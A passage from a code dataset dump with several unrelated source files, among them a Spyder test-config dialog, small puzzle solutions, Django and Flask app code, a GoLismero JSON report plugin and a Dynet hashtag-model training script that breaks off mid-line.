wdir_layout.addWidget(self.wdir_lineedit)\n self.wdir_button = QPushButton(ima.icon('DirOpenIcon'), '', self)\n self.wdir_button.setToolTip(_(\"Select directory\"))\n self.wdir_button.clicked.connect(lambda: self.select_directory())\n wdir_layout.addWidget(self.wdir_button)\n layout.addLayout(wdir_layout)\n\n layout.addSpacing(20)\n\n self.buttons = QDialogButtonBox(QDialogButtonBox.Ok |\n QDialogButtonBox.Cancel)\n layout.addWidget(self.buttons)\n self.buttons.accepted.connect(self.accept)\n self.buttons.rejected.connect(self.reject)\n\n ok_button = self.buttons.button(QDialogButtonBox.Ok)\n ok_button.setEnabled(False)\n self.pytest_button.toggled.connect(lambda: ok_button.setEnabled(True))\n self.nose_button.toggled.connect(lambda: ok_button.setEnabled(True))\n\n if config.framework == 'py.test':\n self.pytest_button.setChecked(True)\n elif config.framework == 'nose':\n self.nose_button.setChecked(True)\n self.wdir_lineedit.setText(config.wdir)\n\n def select_directory(self):\n \"\"\"Display dialog for user to select working directory.\"\"\"\n basedir = to_text_string(self.wdir_lineedit.text())\n if not osp.isdir(basedir):\n basedir = getcwd()\n title = _(\"Select directory\")\n directory = getexistingdirectory(self, title, basedir)\n if directory:\n self.wdir_lineedit.setText(directory)\n\n def get_config(self):\n \"\"\"\n Return the test configuration specified by the user.\n\n Returns\n -------\n Config\n Test configuration\n \"\"\"\n if self.pytest_button.isChecked():\n framework = 'py.test'\n elif self.nose_button.isChecked():\n framework = 'nose'\n else:\n framework = None\n return Config(framework=framework, wdir=self.wdir_lineedit.text())\n\n\ndef ask_for_config(config, parent=None):\n \"\"\"\n Ask user to specify a test configuration.\n\n This is a convenience function which displays a modal dialog window\n of type `ConfigDialog`.\n \"\"\"\n dialog = ConfigDialog(config, parent)\n result = dialog.exec_()\n if result == QDialog.Accepted:\n return dialog.get_config()\n\n\nif __name__ == '__main__':\n app = QApplication([])\n config = Config(framework=None, wdir=getcwd())\n print(ask_for_config(config))\n","sub_path":"spyder_unittest/widgets/configdialog.py","file_name":"configdialog.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117838331","text":"import math\n\nf = open(\"inputs/day3.txt\", \"r\")\ninp = list(f.read().split(\"\\n\"))\n\nc = [0] * 5\nfor i in range(1, len(inp)):\n c = [\n sum(x)\n for x in zip(\n [(inp[i][(k * i) % len(inp[i])] == \"#\") for k in [1, 3, 5, 7]] + [0], c\n )\n ]\n if i % 2 == 0:\n if inp[i][(i // 2) % len(inp[i])] == \"#\":\n c[4] += 1\n\nprint(f\"Part 1: {c[1]}\")\nprint(f\"Part 2: {math.prod(c)}\")\n","sub_path":"solutions/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"141577421","text":"\n\nfrom xai.brain.wordbase.nouns._potsherd import _POTSHERD\n\n#calss header\nclass _POTSHERDS(_POTSHERD, ):\n\tdef __init__(self,): \n\t\t_POTSHERD.__init__(self)\n\t\tself.name = \"POTSHERDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"potsherd\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_potsherds.py","file_name":"_potsherds.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"30806345","text":"from application import db\nfrom application.auth.models import User\n\nfrom application.models import Base\n\nfrom sqlalchemy.sql import text\n\nclass Recipe(Base):\n\n header = db.Column(db.String(50), nullable=False)\n category = db.Column(db.String(50), nullable=False)\n\n description = db.Column(db.String(1000), nullable=True)\n directions = db.Column(db.String(10000), nullable=False)\n\n account_id = db.Column(db.Integer, db.ForeignKey('account.id'),\n nullable=False)\n\n def __init__(self, header, category, description, directions):\n self.header = header\n self.category = category\n self.description = description\n self.directions = directions\n \n\n @staticmethod\n def count_my_recipes(user_id):\n stmt = text(\"SELECT COUNT(*) FROM Recipe WHERE account_id = :user_id\").params(user_id=user_id)\n res = db.engine.execute(stmt)\n\n response = []\n\n for row in res:\n response.append(row[0])\n\n return response\n\n\n @staticmethod\n def list_how_many_recipes_per_user():\n stmt = text(\"SELECT Account.name, COUNT(Recipe.account_id) AS amount\"\n \" FROM Account\"\n \" LEFT JOIN Recipe ON Account.id = Recipe.account_id\"\n \" GROUP BY Account.id, Recipe.account_id\"\n \" ORDER BY amount DESC\")\n res = db.engine.execute(stmt)\n\n response = []\n for row in res:\n response.append({\"name\":row[0], \"count\":row[1]})\n\n return response\n \n\nclass RecipeIngredient(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n\n amount = db.Column(db.String(50), nullable=True)\n unit = db.Column(db.String(50), nullable=True)\n\n recipe_id = db.Column(db.Integer, db.ForeignKey('recipe.id'),\n nullable=False)\n\n ingredient_id = db.Column(db.Integer, db.ForeignKey('ingredient.id'),\n nullable=False)\n\n def __init__(self, amount=None, unit=None):\n if amount is None:\n amount = {}\n elif unit is None:\n unit = {}\n else:\n self.amount = amount\n self.unit = unit","sub_path":"application/recipes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"456969628","text":"# Restaurant menu\n# Simple GUI application\n\n\nfrom tkinter import *\n\nclass Menu(Frame):\n def __init__(self, master):\n super(Menu, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n Label(self,\n text = \"SUSHI MENU\"\n ).grid(row = 0, column = 1, sticky = W)\n\n self.nigiri = BooleanVar()\n Label(self,\n text = \"Nigiri\"\n ).grid(row = 2, column = 0, sticky = W)\n Label(self,\n text = \"2.45 $\"\n ).grid(row = 2, column = 1, sticky = W)\n\n Checkbutton(self,\n variable = self.nigiri\n ).grid(row = 2, column = 2, sticky = W)\n Label(self,\n text = \"Amount:\"\n ).grid(row = 2, column = 3, sticky = W)\n self.nigiri_amount = Entry(self)\n self.nigiri_amount.grid(row = 2, column = 4, sticky = W)\n\n self.maki = BooleanVar()\n Label(self,\n text = \"Maki\"\n ).grid(row = 3, column = 0, sticky = W)\n Label(self,\n text = \"4.89 $\"\n ).grid(row = 3, column = 1, sticky = W)\n Checkbutton(self,\n variable = self.maki\n ).grid(row = 3, column = 2, sticky = W)\n Label(self,\n text = \"Amount:\"\n ).grid(row = 3, column = 3, sticky = W)\n self.maki_amount = Entry(self)\n self.maki_amount.grid(row = 3, column = 4, sticky = W)\n\n self.futomaki = BooleanVar()\n Label(self,\n text = \"Futomaki\"\n ).grid(row = 4, column = 0, sticky = W)\n Label(self,\n text = \"12.99 $\"\n ).grid(row = 4, column = 1, sticky = W)\n Checkbutton(self,\n variable = self.futomaki\n ).grid(row = 4, column = 2, sticky = W)\n Label(self,\n text = \"Amount:\"\n ).grid(row = 4, column = 3, sticky = W)\n self.futomaki_amount = Entry(self)\n self.futomaki_amount.grid(row = 4, column = 4, sticky = W)\n\n Button(self,\n text = \"Order!\",\n command = self.order,\n ).grid(row = 5, column = 0, sticky = W)\n\n self.yours = Text(self, width = 50, height = 10, wrap = WORD)\n self.yours.grid(row = 6, column = 0, columnspan = 5)\n\n def order(self):\n price = 0\n order = \"\"\n maki = self.maki_amount.get()\n nigiri = self.nigiri_amount.get()\n futomaki = self.futomaki_amount.get()\n if self.nigiri.get():\n price += 2.45 * int(nigiri)\n order += \"nigiri, \"\n if self.maki.get():\n price += 4.89 * int(maki)\n order += \"maki, \"\n if self.futomaki.get():\n price += 12.99 * int(futomaki)\n order += \"futomaki.\"\n\n yours = \"You have ordered: \"\n yours += order\n yours += \"\\nTotal cost: \"\n yours += str(price)\n\n self.yours.delete(0.0, END)\n self.yours.insert(0.0, yours)\n\nroot = Tk()\nroot.title(\"Menu\")\napp = Menu(root)\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n","sub_path":"Python programming for the absolute beginner - Michael Dawson/Chapter 10 - GUI - tkinter/10.3.py","file_name":"10.3.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"247916493","text":"import math\nimport tensorflow as tf \n\nfrom multi_pose.max_heap import MaxHeap\n\ndef scoreIsMaximumInLocalWindow(\n keypointId, score, heatmapY, heatmapX, localMaximumRadius, scores\n ):\n height = scores.shape[0]\n width = scores.shape[1]\n\n localMaximum = True \n yStart = max(heatmapY - localMaximumRadius, 0)\n yEnd = min(heatmapY + localMaximumRadius + 1, height)\n for yCurrent in range(yStart, yEnd):\n xStart = max(heatmapX - localMaximumRadius, 0)\n xEnd = min(heatmapX + localMaximumRadius + 1, width)\n for xCurrent in range(xStart, xEnd):\n if scores[yCurrent][xCurrent][keypointId] > score:\n localMaximum = False \n break \n if not localMaximum:\n break \n return localMaximum \n\ndef buildPartWithScoreQueue(\n scoreThreshold, localMaximumRadius ,scores \n ):\n [height, width, numKeypoints] = scores.shape \n def identity(x):\n return x['score']\n queue = MaxHeap(height * width * numKeypoints, identity)\n \n for heatmapY in range(height):\n for heatmapX in range(width):\n for keypointId in range(numKeypoints):\n score = scores[heatmapY][heatmapX][keypointId]\n if score < scoreThreshold:\n continue \n if scoreIsMaximumInLocalWindow(\n keypointId, score, heatmapY, heatmapX, localMaximumRadius, scores\n ):\n queue.enqueue({'score' : score, 'part': {'heatmapY':heatmapY, 'heatmapX' : heatmapX, 'id': keypointId}})\n return queue \n\n","sub_path":"multi_pose/build_part_with_score_queue.py","file_name":"build_part_with_score_queue.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"82345143","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Dani/Documents/Projects/Golismero_2.0/src_github/plugins/report/json.py\n# Compiled at: 2014-02-10 15:24:09\n__license__ = '\\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2013\\n\\nAuthors:\\n Daniel Garcia Garcia a.k.a cr0hn | cr0hn<@>cr0hn.com\\n Mario Vilas | mvilas<@>gmail.com\\n\\nGolismero project site: https://github.com/golismero\\nGolismero project mail: golismero.project<@>gmail.com\\n\\nThis program is free software; you can redistribute it and/or\\nmodify it under the terms of the GNU General Public License\\nas published by the Free Software Foundation; either version 2\\nof the License, or (at your option) any later version.\\n\\nThis program is distributed in the hope that it will be useful,\\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\\nGNU General Public License for more details.\\n\\nYou should have received a copy of the GNU General Public License\\nalong with this program; if not, write to the Free Software\\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\\n'\n__all__ = [\n 'JSONOutput']\nfrom golismero.api import VERSION\nfrom golismero.api.audit import get_audit_times, parse_audit_times\nfrom golismero.api.config import Config\nfrom golismero.api.data import Data\nfrom golismero.api.data.db import Database\nfrom golismero.api.logger import Logger\nfrom golismero.api.plugin import ReportPlugin\nfrom datetime import datetime\nfrom warnings import warn\ntry:\n from cjson import encode\n dumps = encode\n\n def dump(obj, fp):\n fp.write(encode(obj))\n\n\nexcept ImportError:\n try:\n from simplejson import dump, dumps\n except ImportError:\n from json import dump, dumps\n\nclass JSONOutput(ReportPlugin):\n \"\"\"\n Dumps the output in JSON format.\n \"\"\"\n EXTENSION = '.json'\n\n def generate_report(self, output_file):\n Logger.log_verbose('Writing audit results to file: %s' % output_file)\n report_data = self.get_report_data()\n self.serialize_report(output_file, report_data)\n del report_data\n self.launch_command(output_file)\n\n def serialize_report(self, output_file, report_data):\n \"\"\"\n Serialize the data given as a Python dictionary into the format\n supported by this plugin.\n\n :param output_file: Output file for this report plugin.\n :type output_file: str\n\n :param report_data: Report data returned by :ref:`get_report_data`().\n :type report_data: dict(str -> *)\n \"\"\"\n with open(output_file, 'wb') as (fp):\n dump(report_data, fp)\n\n def test_data_serialization(self, data):\n \"\"\"\n Serialize a single Data object converted into a Python dictionary\n in the format supported by this plugin.\n\n This allows the plugin to test if the given Data object would be\n serialized correctly, allowing better error control.\n\n :param data: Single Data object converted into a Python dictionary.\n :type data: dict(str -> *)\n\n :raises Exception: The data could not be serialized.\n \"\"\"\n dumps(data)\n\n def get_report_data(self):\n \"\"\"\n Get the data to be included in the report as a Python dictionary.\n There are two supported modes: \"nice\" and \"dump\". The output mode is\n taken directly from the plugin configuration.\n\n :returns: Data to include in the report.\n :rtype: dict(str -> *)\n \"\"\"\n self.__full_report = not Config.audit_config.only_vulns\n report_time = str(datetime.utcnow())\n start_time, stop_time = get_audit_times()\n start_time, stop_time, run_time = parse_audit_times(start_time, stop_time)\n mode = Config.plugin_args.get('mode', 'dump')\n mode = mode.replace(' ', '')\n mode = mode.replace('\\r', '')\n mode = mode.replace('\\n', '')\n mode = mode.replace('\\t', '')\n mode = mode.lower()\n if mode not in ('dump', 'nice'):\n Logger.log_error('Invalid output mode: %s' % mode)\n mode = 'dump'\n self.__dumpmode = mode == 'dump'\n Logger.log_more_verbose('Output mode: %s' % ('dump' if self.__dumpmode else 'nice'))\n root = dict()\n if self.__dumpmode:\n root['version'] = 'GoLismero ' + VERSION\n else:\n root['GoLismero Version'] = 'GoLismero ' + VERSION\n if self.__dumpmode:\n root['report_type'] = 'full' if self.__full_report else 'brief'\n else:\n root['Report Type'] = 'Full' if self.__full_report else 'Brief'\n if self.__dumpmode:\n root['summary'] = {'audit_name': Config.audit_name, 'start_time': start_time, \n 'stop_time': stop_time, \n 'run_time': run_time, \n 'report_time': report_time}\n else:\n root['Summary'] = {'Audit Name': Config.audit_name, 'Start Time': start_time, \n 'Stop Time': stop_time, \n 'Run Time': run_time, \n 'Report Time': report_time}\n if self.__dumpmode:\n wildcards = [ '*.' + x for x in Config.audit_scope.roots ]\n root['audit_scope'] = {'addresses': Config.audit_scope.addresses, 'roots': wildcards, \n 'domains': Config.audit_scope.domains, \n 'web_pages': Config.audit_scope.web_pages}\n else:\n domains = [ '*.' + x for x in Config.audit_scope.roots ]\n domains.extend(Config.audit_scope.domains)\n domains.sort()\n root['Audit Scope'] = {'IP Addresses': Config.audit_scope.addresses, \n 'Domains': domains, \n 'Web Pages': Config.audit_scope.web_pages}\n key_vuln = 'vulnerabilities' if self.__dumpmode else 'Vulnerabilities'\n key_res = 'resources' if self.__dumpmode else 'Assets'\n key_info = 'informations' if self.__dumpmode else 'Evidences'\n key_fp = 'false_positives' if self.__dumpmode else 'False Positives'\n root[key_vuln] = dict()\n root[key_res] = dict()\n root[key_info] = dict()\n root[key_fp] = dict()\n self.__vulnerable = set()\n try:\n datas = self.__collect_vulns(False)\n if datas or self.__full_report:\n fp = self.__collect_vulns(True)\n self.__fp = set(fp)\n try:\n if datas:\n self.__add_data(root[key_vuln], datas, Data.TYPE_VULNERABILITY)\n datas = self.__collect_data(Data.TYPE_RESOURCE)\n if datas:\n self.__add_data(root[key_res], datas, Data.TYPE_RESOURCE)\n datas = self.__collect_data(Data.TYPE_INFORMATION)\n if datas:\n self.__add_data(root[key_info], datas, Data.TYPE_INFORMATION)\n finally:\n self.__fp.clear()\n\n if self.__full_report and fp:\n self.__add_data(root[key_fp], fp, Data.TYPE_VULNERABILITY)\n finally:\n self.__vulnerable.clear()\n\n return root\n\n def __iterate_data(self, identities=None, data_type=None, data_subtype=None):\n if identities is None:\n identities = list(Database.keys(data_type))\n if identities:\n for page in xrange(0, len(identities), 100):\n for data in Database.get_many(identities[page:page + 100], data_type):\n yield data\n\n return\n\n def __collect_data(self, data_type):\n if self.__full_report:\n datas = [ data.identity for data in self.__iterate_data(data_type=data_type)\n ]\n else:\n datas = [ data.identity for data in self.__iterate_data(data_type=data_type) if data.identity in self.__vulnerable\n ]\n datas.sort()\n return datas\n\n def __collect_vulns(self, fp_filter):\n vulns = []\n for vuln in self.__iterate_data(data_type=Data.TYPE_VULNERABILITY):\n if bool(vuln.false_positive) == fp_filter:\n vulns.append(vuln.identity)\n if fp_filter:\n self.__vulnerable.difference_update(vuln.links)\n else:\n self.__vulnerable.update(vuln.links)\n\n vulns.sort()\n return vulns\n\n def __add_data(self, parent, datas, data_type):\n for data in self.__iterate_data(datas, data_type):\n i = data.identity\n d = i\n try:\n if self.__dumpmode:\n d = data.to_dict()\n else:\n d = data.display_properties\n self.test_data_serialization(d)\n except Exception:\n from pprint import pformat\n warn('Cannot serialize data:\\n%s' % pformat(d), RuntimeWarning)\n continue\n\n parent[i] = d","sub_path":"pycfiles/golismero-2.0.3-1.tar/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"380962554","text":"# author: mofhu@github\n# A. Sum\n\nt = int(input())\n\nfor ncase in range(1, t+1):\n abc = [int(s) for s in input().split(' ')]\n abc.sort()\n # print(abc)\n if abc[0] + abc[1] == abc[2]:\n print('YES')\n else:\n print('NO')\n\n\n\n\n","sub_path":"codeforces/Round827/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"193350221","text":"from django.conf.urls import patterns, include, url\nfrom surlex.dj import surl\nfrom .views import (OrderList, OrderDetail, OrderDonationDetail, PaymentProfileCurrent, VoucherDetail,\n OrderVoucherList, OrderVoucherDetail, VoucherDonationList, VoucherDonationDetail,\n CustomVoucherRequestList, OrderDonationList, DocDataDirectDebitCurrent, PaymentCurrent)\n\nurlpatterns = patterns('',\n # Orders\n url(r'^orders/$', OrderList.as_view(), name='fund-order-list'),\n surl(r'^orders/<pk:#>$', OrderDetail.as_view(), name='fund-order-detail'),\n surl(r'^orders/<order_id:#>/donations/$', OrderDonationList.as_view(), name='fund-order-donation-list'),\n surl(r'^orders/<order_id:#>/donations/<pk:#>$', OrderDonationDetail.as_view(), name='fund-order-donation-detail'),\n surl(r'^orders/<order_id:#>/vouchers/$', OrderVoucherList.as_view(), name='fund-order-voucher-list'),\n surl(r'^orders/<order_id:#>/vouchers/<pk:#>$', OrderVoucherDetail.as_view(), name='fund-order-voucher-detail'),\n\n # Current Order (i.e. the server-side shopping cart).\n url(r'^orders/current$', OrderDetail.as_view(), {'alias': 'current'}, name='fund-order-detail'),\n url(r'^orders/current/donations/$', OrderDonationList.as_view(), {'alias': 'current'}, name='fund-order-donation-list'),\n surl(r'^orders/current/donations/<pk:#>$', OrderDonationDetail.as_view(), {'alias': 'current'}, name='fund-order-donation-detail'),\n url(r'^orders/current/vouchers/$', OrderVoucherList.as_view(), {'alias': 'current'}, name='fund-order-voucher-list'),\n surl(r'^orders/current/vouchers/<pk:#>$', OrderVoucherDetail.as_view(), {'alias': 'current'}, name='fund-order-voucher-detail'),\n\n # Vouchers\n surl(r'^vouchers/<code:s>$', VoucherDetail.as_view(), name='voucher-detail'),\n surl(r'^vouchers/<code:s>/donations/$', VoucherDonationList.as_view(), name='voucher-donation-list'),\n surl(r'^vouchers/<code:s>/donations/<pk:#>$', VoucherDonationDetail.as_view(), name='voucher-donation-list'),\n surl(r'^customvouchers/$', CustomVoucherRequestList.as_view(), name='custom-voucher-request-list'),\n\n # Payments\n url(r'^paymentprofiles/current$', PaymentProfileCurrent.as_view(), name='payment-profile-current'),\n url(r'^docdatadirectdebit/current$', DocDataDirectDebitCurrent.as_view(), name='direct-debit-current'),\n url(r'^payments/current$', PaymentCurrent.as_view(), name='payment-current'),\n # The Payment REST API.\n url(r'', include('apps.cowry.urlsapi')),\n)\n","sub_path":"apps/fund/urlsapi.py","file_name":"urlsapi.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"38515436","text":"import random\nimport spacy\nimport math\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom collections import defaultdict, Counter\nfrom time import time\nfrom tqdm import tqdm\n\n#from sklearn.naive_bayes import MultinomialNB\n#from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nimport string\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nimport dynet_config\ndynet_config.set(mem=4096, random_seed=12345, autobatch=True) # was 2048 mem\ndynet_config.set_gpu()\n\nimport dynet as dy\n\ndyparams = dy.DynetParams()\n#dyparams.init()\ndyparams.set_requested_gpus(1)\n\nimport pdb\n\n\nprint(\"Loading spaCy...\", end=' ')\nnlp = spacy.load('en')\nassert nlp.path is not None\nprint ('done.')\n\n\nMAX_LEN = 100\nNUM_TAGS = 3883\n# VOCAB_CAP = 10000\nVOCAB_CAP = 50000\n\nUNK = '<UNK>'\nSTART = '<S>'\nEND = '</S>'\n\n\n# # Load Data for Parsing\nprint(\"Loading data...\")\n\nwith open('/usr0/home/mamille2/twitter/data/huang2016/huang2016_train.aligned.pkl', 'rb') as f:\n# twitter_texts, twitter_tags, twitter_histories = pickle.load(f)\n twitter_texts, twitter_tags, _ = pickle.load(f)\n# , twitter_tags, _ = pickle.load(f)\n \nwith open('/usr0/home/mamille2/twitter/data/huang2016/huang2016_valid.aligned.pkl', 'rb') as f:\n# dev_texts, dev_tags, dev_histories = pickle.load(f)\n dev_texts, dev_tags, _ = pickle.load(f)\n# _, dev_tags, _ = pickle.load(f)\n \nwith open('/usr0/home/mamille2/twitter/data/huang2016/huang2016_test.aligned.pkl', 'rb') as f:\n# _, test_tags, _ = pickle.load(f)\n test_texts, test_tags, _ = pickle.load(f)\n \n\n# # Load Data\n\ndef index_tags(tags_list, tag_set, tag_dict):\n return [[tag_dict[tag] for tag in tags if tag in tag_set] for tags in tags_list]\n\n\n# Extract tag set\ntag_counts = defaultdict(int)\nfor t in twitter_tags:\n for x in t:\n tag_counts[x] += 1\n\ntop_k_tags = set(sorted(tag_counts, key=tag_counts.get, reverse=True)[:NUM_TAGS])\n\ntag_set = set()\nfor t in twitter_tags:\n tag_set.update(set([x for x in t if x in top_k_tags]))\n \ntag_set = sorted(tag_set)\nprint ('{} unique tags.'.format(len(tag_set)))\n\ntag_indexes = defaultdict(lambda: len(tag_indexes))\nparsed_tags = index_tags(twitter_tags, tag_set, tag_indexes)\nidx_to_tag = {v: k for k, v in tag_indexes.items()}\n\n\ntry:\n print ('Attempting to open preprecessed TRAIN data ... ', end='')\n# raise NotImplemented\n \n t0=time()\n with open('/usr0/home/mamille2/twitter/data/huang2016/parsed_twitter_train_data_no_histories.pkl', 'rb') as f:\n vocab, parsed_texts, parsed_tags = pickle.load(f)\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \nexcept:\n print ('FAIL.')\n \n print ('\\tParsing texts ... ', end='')\n t0=time()\n parsed_texts = [[str(w) for w in t][:MAX_LEN] for t in nlp.pipe([x.encode('ascii', 'ignore').decode('ascii').lower() for x in twitter_texts], n_threads=3, batch_size=20000)]\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \n print ('\\tCounting words ... ', end='')\n word_counts = defaultdict(int)\n for t in parsed_texts:\n for x in t:\n word_counts[x] += 1\n top_k_words = set(sorted(word_counts, key=word_counts.get, reverse=True)[:VOCAB_CAP-3])\n\n word_set = set()\n for t in parsed_texts:\n word_set.update(set([x for x in t if x in top_k_words]))\n print ('DONE. ({:.3f}s)'.format(time()-t0)) \n \n vocab = defaultdict(lambda: len(vocab))\n print ('\\tIndexing texts ... ', end='')\n t0=time()\n parsed_texts = [[vocab[START]] + [(vocab[w] if w in word_set else vocab[UNK]) for w in t] + [vocab[END]] for t in parsed_texts]\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \n unk_idx = vocab[UNK]\n sos_idx = vocab[START]\n eos_idx = vocab[END]\n \n print ('\\tSAVING parsed data ... ', end='')\n t0=time()\n with open('parsed_twitter_train_data_no_histories.pkl', 'wb') as f:\n pickle.dump((dict(vocab), parsed_texts, parsed_tags), f) \n print ('DONE. ({:.3f}s)'.format(time()-t0))\n\nunk_idx = vocab[UNK]\nsos_idx = vocab[START]\neos_idx = vocab[END]\n# Set unknown words to be UNK --> note as written, the paper does not indicate that any training data is labeled as UNK...\nvocab = defaultdict(lambda: unk_idx, vocab)\nidx_to_vocab = {v: k for k, v in vocab.items()}\n\nVOCAB_SIZE = len(vocab)\nprint ('Vocab size:', VOCAB_SIZE)\n\n\n# Check number of tags\n#tagc = Counter([t for tags in parsed_tags for t in tags])\n#len(tagc)\n\n\ntry:\n print ('Attempting to open preprecessed DEV and TEST data ... ', end='')\n# raise NotImplemented\n \n t0=time()\n with open('/usr0/home/mamille2/twitter/data/huang2016/parsed_twitter_test_dev_data_no_histories.pkl', 'rb') as f:\n parsed_dev_texts, parsed_test_texts = pickle.load(f)\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \nexcept:\n print ('FAIL.')\n print ('\\tParsing texts ... ', end='')\n t0=time()\n parsed_dev_texts = [[vocab[START]] + [vocab[str(w)] for w in t if not w.is_stop][:MAX_LEN] + [vocab[END]] for t in nlp.pipe([x.encode('ascii', 'ignore').decode('ascii').lower() for x in dev_texts], n_threads=3, batch_size=20000)]\n parsed_test_texts = [[vocab[START]] + [vocab[str(w)] for w in t if not w.is_stop][:MAX_LEN] + [vocab[END]] for t in nlp.pipe([x.encode('ascii', 'ignore').decode('ascii').lower() for x in test_texts], n_threads=3, batch_size=20000)]\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \n print ('\\tSAVING parsed data ... ', end='')\n t0=time()\n with open('parsed_twitter_test_dev_data_no_histories.pkl', 'wb') as f:\n pickle.dump((parsed_dev_texts, parsed_test_texts), f) \n print ('DONE. ({:.3f}s)'.format(time()-t0))\n\n\ntrain = list(zip(parsed_texts, parsed_tags))\ndev_tags = index_tags(dev_tags, tag_set, tag_indexes)\ndev = list(zip(parsed_dev_texts, dev_tags))\ntest_tags = index_tags(test_tags, tag_set, tag_indexes)\ntest = list(zip(parsed_test_texts, test_tags))\n\n\n# # Model Parameters and Settings\nprint(\"Building model...\")\n\nEMBEDDING_DIM = 128\n# HIDDEN_DIM = 256\nHIDDEN_DIM = 512\nQ_DIM = 512\nDROPOUT = 0.2\n# DROPOUT = 0\nALPHA = 0.01\nEPSILON_MAX = .9\nEPSILON_MIN = 0.00\nKL_WEIGHT_START = 0.0\n\nBATCH_SIZE = 16\nPATIENCE = 3\n\n\n# Initialize dynet model\nmodel = dy.ParameterCollection()\n\n# The paper uses AdaGrad\ntrainer = dy.AdamTrainer(model)\n\n# Embedding parameters\nembed = model.add_lookup_parameters((VOCAB_SIZE, EMBEDDING_DIM))\n\n# Recurrent layers for tweet encoding\nlstm_encode = dy.LSTMBuilder(1, EMBEDDING_DIM, HIDDEN_DIM, model)\nlstm_decode = dy.LSTMBuilder(1, EMBEDDING_DIM, Q_DIM, model)\n\n# Encoder MLP for tweet encoding\nW_mu_tweet_p = model.add_parameters((Q_DIM, HIDDEN_DIM))\nV_mu_tweet_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_mu_tweet_p = model.add_parameters((Q_DIM))\n\nW_sig_tweet_p = model.add_parameters((Q_DIM, HIDDEN_DIM))\nV_sig_tweet_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_sig_tweet_p = model.add_parameters((Q_DIM))\n\nW_mu_tag_p = model.add_parameters((Q_DIM, NUM_TAGS))\nV_mu_tag_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_mu_tag_p = model.add_parameters((Q_DIM))\n\nW_sig_tag_p = model.add_parameters((Q_DIM, NUM_TAGS))\nV_sig_tag_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_sig_tag_p = model.add_parameters((Q_DIM))\n\nW_mu_p = model.add_parameters((Q_DIM, 2 * HIDDEN_DIM))\nb_mu_p = model.add_parameters((Q_DIM))\n\nW_sig_p = model.add_parameters((Q_DIM, 2 * HIDDEN_DIM))\nb_sig_p = model.add_parameters((Q_DIM))\n\nW_hidden_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_hidden_p = model.add_parameters((HIDDEN_DIM))\n\nW_tweet_softmax_p = model.add_parameters((VOCAB_SIZE, Q_DIM))\nb_tweet_softmax_p = model.add_parameters((VOCAB_SIZE))\n\nW_tag_output_p = model.add_parameters((NUM_TAGS, HIDDEN_DIM))\nb_tag_output_p = model.add_parameters((NUM_TAGS))\n\n\n\ndef reparameterize(mu, log_sigma_squared):\n d = mu.dim()[0][0]\n sample = dy.random_normal(d)\n covar = dy.exp(log_sigma_squared * 0.5)\n\n return mu + dy.cmult(covar, sample)\n\ndef mlp(x, W, V, b):\n return V * dy.tanh(W * x + b)\n\n\ndef calc_loss(sent, epsilon=0.0):\n #dy.renew_cg()\n \n # Transduce all batch elements with an LSTM\n src = sent[0]\n tags = sent[1]\n\n # initialize the LSTM\n init_state_src = lstm_encode.initial_state()\n\n # get the output of the first LSTM\n src_output = init_state_src.add_inputs([embed[x] for x in src])[-1].output()\n\n # Now compute mean and standard deviation of source hidden state.\n W_mu_tweet = dy.parameter(W_mu_tweet_p)\n V_mu_tweet = dy.parameter(V_mu_tweet_p)\n b_mu_tweet = dy.parameter(b_mu_tweet_p)\n\n W_sig_tweet = dy.parameter(W_sig_tweet_p)\n V_sig_tweet = dy.parameter(V_sig_tweet_p)\n b_sig_tweet = dy.parameter(b_sig_tweet_p)\n \n # Compute tweet encoding\n mu_tweet = dy.dropout(mlp(src_output, 